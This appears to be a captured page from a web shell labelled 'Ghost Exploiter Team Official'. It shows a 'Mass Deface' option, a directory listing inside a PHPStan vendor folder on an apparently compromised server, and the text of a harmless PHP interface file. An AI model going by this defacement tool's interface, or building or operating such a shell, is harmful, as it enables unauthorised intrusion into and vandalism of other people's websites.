Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
phpstan
/
phpdoc-parser
/
src
/
Ast
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
ConstExpr
--
ren
NodeVisitor
--
ren
PhpDoc
--
ren
Type
--
ren
AbstractNodeVisitor.php
0.655KB
edt
ren
Attribute.php
0.333KB
edt
ren
Comment.php
0.648KB
edt
ren
Node.php
0.34KB
edt
ren
NodeAttributes.php
0.666KB
edt
ren
NodeTraverser.php
8.205KB
edt
ren
NodeVisitor.php
2.453KB
edt
ren
<?php declare(strict_types = 1); namespace PHPStan\PhpDocParser\Ast; interface Node { public function __toString(): string; /** * @param mixed $value */ public function setAttribute(string $key, $value): void; public function hasAttribute(string $key): bool; /** * @return mixed */ public function getAttribute(string $key); }